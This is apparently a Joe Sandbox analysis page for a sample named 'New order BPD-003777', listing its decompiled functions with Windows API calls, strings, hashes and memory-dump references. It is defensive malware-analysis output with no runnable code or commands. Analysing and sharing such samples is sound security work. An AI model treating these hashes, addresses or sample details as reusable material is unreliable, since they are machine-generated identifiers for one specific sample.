Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: cf1702a69f232bcc4ef0ac7b90f60b203ab775a0672c12e281d31c5992c4c2b5
Instruction ID: dd5363400bac91bc27c761eeec9ec7f052066cef79f037e7977273b969e2f774
Opcode Fuzzy Hash: cf1702a69f232bcc4ef0ac7b90f60b203ab775a0672c12e281d31c5992c4c2b5
Instruction Fuzzy Hash: A9319C72251214BFEB168F50DC8AFEB3BADEF0D711F089055FE089A291C6759C60CBA4

Function 00304FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00305007
NULL Pointer assignment, xrefs: 0030502E, 00305383

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 9f200c4be87f980954088e49ed3af5fbeb192ef5df18fb3d0c2be13e54646bfa
Instruction ID: 4bea42e5bb57017bbdf16d6301328198d5b497f8e07f4c71548a99f7b95d16cf
Opcode Fuzzy Hash: 9f200c4be87f980954088e49ed3af5fbeb192ef5df18fb3d0c2be13e54646bfa
Instruction Fuzzy Hash: 13D1F175A0160AAFDF15CFA8C890BAFB7B9BF48344F158069E915AB280E770DD41CF90

Function 00304523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00304648
VariantInit.OLEAUT32(?), ref: 00304749
VariantClear.OLEAUT32(?), ref: 00304753
VariantClear.OLEAUT32(?), ref: 003047B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0030472C
Null Object assignment in FOR..IN loop, xrefs: 003045D8, 00304706, 003047BE

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 1dc4384c83b5435ea6c75e22c56911ee9edb012382c6ce5c83e29f48ce23db1e
Instruction ID: b00d23df35c67c32f027e214cb3653930933562bb6ac56e43624d0da7279d28b
Opcode Fuzzy Hash: 1dc4384c83b5435ea6c75e22c56911ee9edb012382c6ce5c83e29f48ce23db1e
Instruction Fuzzy Hash: A191A1B1A01219AFDF21CFA5CC54FAEBBB8EF46710F108559F615AB280D7709A41CFA0

Function 0029948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: c7cd36431cfd85cbc9cefe7f910705308bb2fd0cab03890fa16269014a3cde8f
Instruction ID: fcf8d91e1d2ac9afd5216e5b544fe0bc1147dadfe26111156968dc9ab74f5ae4
Opcode Fuzzy Hash: c7cd36431cfd85cbc9cefe7f910705308bb2fd0cab03890fa16269014a3cde8f
Instruction Fuzzy Hash: 62912571D5021AAFCF11CFA9CC84AEEBBB8FF49320F148059E515B7251D378A991CB60

Function 00317E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(010A4B60), ref: 00317F37
IsWindowEnabled.USER32(010A4B60), ref: 00317F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0031801E
SendMessageW.USER32(010A4B60,000000B0,?,?), ref: 00318051
IsDlgButtonChecked.USER32(?,?), ref: 00318089
GetWindowLongW.USER32(010A4B60,000000EC), ref: 003180AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003180C3

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 719491871c03e1a8d8360e8103b2799d1185f98abd455213bb29b221ff5f0970
Instruction ID: 80f1205dd43bae59d6f0fd62d24ca152751c68a710dfa471f4505c66c42b9570
Opcode Fuzzy Hash: 719491871c03e1a8d8360e8103b2799d1185f98abd455213bb29b221ff5f0970
Instruction Fuzzy Hash: D6719F74608204AFEB2A9F64CC84FEBBBB9EF0D340F194459E94597261CB31AD96CB10

Function 002EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100), ref: 002EDA74
LoadStringW.USER32(00000000), ref: 002EDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002EDA91
LoadStringW.USER32(00000000), ref: 002EDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 002EDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 002EDAB9

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 67b40b6c09fa92d1fb67f10c0541dd6f8d27450d2c8c5bcd5d04e2c524f8c09e
Instruction ID: 1d23cdb1d2125850ee15ae9f8e0b8d6fae9a5543db4c11b0eb71be4c416ca430
Opcode Fuzzy Hash: 67b40b6c09fa92d1fb67f10c0541dd6f8d27450d2c8c5bcd5d04e2c524f8c09e
Instruction Fuzzy Hash: 8A0186F65902087FE712DBA49D89EE7336CE70C301F4054A6F746E6041E6749E844F74

Function 002F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 002F097B
RtlEnterCriticalSection.NTDLL(?), ref: 002F098D
TerminateThread.KERNEL32(00000000,000001F6,?,?,?,?,?,?,?,?,?,?,?,?,002C26DC), ref: 002F099B
WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,002C26DC), ref: 002F09A9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,002C26DC), ref: 002F09B8
InterlockedExchange.KERNEL32(?,000001F6), ref: 002F09C8
RtlLeaveCriticalSection.NTDLL(?), ref: 002F09CF

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
Instruction ID: 375047b79cb7f078f131039387d06c60ef6ec5747e0b680d8de0a87c79d0117e
Opcode Fuzzy Hash: 54a7156a3423b852e63191d8702d7237ff788c8b8a589d66259b427986b31727
Instruction Fuzzy Hash: CBF03131492612FBDB525F94EE8CBE6BB39FF09742F406425F202508A1D774A476CF90

Function 00285D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00285D30
GetWindowRect.USER32(?,?), ref: 00285D71
ScreenToClient.USER32(?,000000FF), ref: 00285D99
GetClientRect.USER32(?,?), ref: 00285ED7
GetWindowRect.USER32(?,?), ref: 00285EF8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: ab7b9fa48e38edf19ec0c9e0849ee5a235626678a635c50add07ebf3854bf62d
Instruction ID: 68a71c0b3d3b0d1b0fcaa2610f930d50cdf520e40ffbd809225fb62b67784e95
Opcode Fuzzy Hash: ab7b9fa48e38edf19ec0c9e0849ee5a235626678a635c50add07ebf3854bf62d
Instruction Fuzzy Hash: 96B19038A2075ADBDB10DFA8C840BEEB7F1FF58310F14951AE899D7290D734AA60CB50

Function 002DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002DF7B9
SysAllocString.OLEAUT32(?), ref: 002DF860
VariantCopy.OLEAUT32(?,00000000), ref: 002DF889
VariantClear.OLEAUT32(?), ref: 002DF8AD
VariantCopy.OLEAUT32(?,00000000), ref: 002DF8B1
VariantClear.OLEAUT32(?), ref: 002DF8BB

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 32d9cd6949bace35585d2e69a7e06556841c2a5283f542e9df5faf9e7f504d0f
Instruction ID: be8f5fdd4ccafb5f48c55f64f12fd00d18875c25b6c644a2014c94e2ce5ee43f
Opcode Fuzzy Hash: 32d9cd6949bace35585d2e69a7e06556841c2a5283f542e9df5faf9e7f504d0f
Instruction Fuzzy Hash: 74510535974310AACF90AF65D9A5769B3A8EF45310F209467EC07DF391DB708C60CB9A

Function 0029920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

BeginPaint.USER32(?,?,?), ref: 00299241
GetWindowRect.USER32(?,?), ref: 002992A5
ScreenToClient.USER32(?,?), ref: 002992C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 002992D3
EndPaint.USER32(?,?,?,?,?), ref: 00299321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002D71EA

Part of subcall function 00299339: BeginPath.GDI32(00000000), ref: 00299357

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
Instruction ID: cc2c3a05a8b83011d2a0576a9313d22cd366ff6047f36d70b823d0ee0fe4bae5
Opcode Fuzzy Hash: fc1b57b87550fe8e4f96ab5e54240814736d747e43d81d91b3e167459cb4731c
Instruction Fuzzy Hash: 3E41B271124301AFDB12DF28CC84FAA7BA8EB4A331F04026DF955872B1D7709C95DBA1

Function 003181DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,002DF3AB,00000000,?,?,00000000,?,002D682C,00000004,00000000,00000000), ref: 0031824C
EnableWindow.USER32(00000000,00000000), ref: 00318272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 003182D1
ShowWindow.USER32(00000000,00000004), ref: 003182E5
EnableWindow.USER32(00000000,00000001), ref: 0031830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0031832F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
Instruction ID: 3a0ece3b45bb9d17828d683ee94c14d125e12024aec1cad3796e0d87c0b4995d
Opcode Fuzzy Hash: 84148b7719aa9982a19b6951efab152b31f608029d708fe012bbb9acb7947d37
Instruction Fuzzy Hash: 6541D438601640AFDB2BCF14C899BE47BF4BB0E715F195568E5184F2B2CB71AC82CB44

Function 002A3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,002A3379,002A2FE5), ref: 002A3390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002A339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002A33B7
SetLastError.KERNEL32(00000000,?,002A3379,002A2FE5), ref: 002A3409

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8d782e9bd053519daa110cc9b4597a7d6c5f15e8e58696db89ff95f7a3caa038
Instruction ID: 9f4743b3db62aacdecd4f944a6b806c67e8923e3c7f79b758b62a9f676038005
Opcode Fuzzy Hash: 8d782e9bd053519daa110cc9b4597a7d6c5f15e8e58696db89ff95f7a3caa038
Instruction Fuzzy Hash: 3F019C3723D312BFEA626F747C815972A8CDB0B774B300229F110841F0EF118D314984

Function 00318A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00299639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00299693
Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996A2
Part of subcall function 00299639: BeginPath.GDI32(?), ref: 002996B9
Part of subcall function 00299639: SelectObject.GDI32(?,00000000), ref: 002996E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00318A4E
LineTo.GDI32(?,00000003,00000000), ref: 00318A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00318A70
LineTo.GDI32(?,00000000,00000003), ref: 00318A80
EndPath.GDI32(?), ref: 00318A90
StrokePath.GDI32(?), ref: 00318AA0

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e1d00203215e2ad749307b093ef6256f55979d336aed0edebb7e9eba5a43ad21
Instruction ID: 43d22d2b801346f4f5a07c590286304cb3974f8aaef3e7c5008bec81959f2288
Opcode Fuzzy Hash: e1d00203215e2ad749307b093ef6256f55979d336aed0edebb7e9eba5a43ad21
Instruction Fuzzy Hash: 5F11F776040108FFDB129F94DC88EEA7F6CEB08350F00C022BA199A1A1C7719DA5DBA0

Function 00281BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00281BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00281BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00281C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00281C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00281C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00281C22

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 267a47bc38b5abf5041f6b58708915e4256b08c7ea7c723402cf650b1af45716
Instruction ID: 5df1849c76b8703209bee509cb1205b5b9214e6897e41449f42dbb120ee82c84
Opcode Fuzzy Hash: 267a47bc38b5abf5041f6b58708915e4256b08c7ea7c723402cf650b1af45716
Instruction Fuzzy Hash: 770167B0942B5ABDE3008F6A8C85B52FFA8FF19354F04411BA15C4BA42C7F5A864CBE5

Function 0028BBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0028BEB3

Strings

D%5, xrefs: 0028BCA2
D%5, xrefs: 0028BDED, 0028BD91, 0028BD1B
D%5, xrefs: 0028BE9A
D%5D%5, xrefs: 0028BCA5

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%5$D%5$D%5$D%5D%5
API String ID: 1385522511-4083595773
Opcode ID: 1137c348a481bbbc240f07f8a29e0af3c53acde9a2328bafd8a6894cde3b8989
Instruction ID: 1285572c52f9d7986d2129d2bb1ed121d705d205967f15125a64e377d5030111
Opcode Fuzzy Hash: 1137c348a481bbbc240f07f8a29e0af3c53acde9a2328bafd8a6894cde3b8989
Instruction Fuzzy Hash: A8918B79A21206DFCB19DF58C0906AAB7F1FF59300F24856ED941AB390E731ADA1CBD0

Function 002A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002A4D1E,?,?,002A4CBE,?,003488B8,0000000C,002A4E63,?,00000000), ref: 002A4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002A4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,002A4D1E,?,?,002A4CBE,?,003488B8,0000000C,002A4E63,?,00000000,00000000), ref: 002A4DC3

Strings

mscoree.dll, xrefs: 002A4D86
CorExitProcess, xrefs: 002A4D98

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
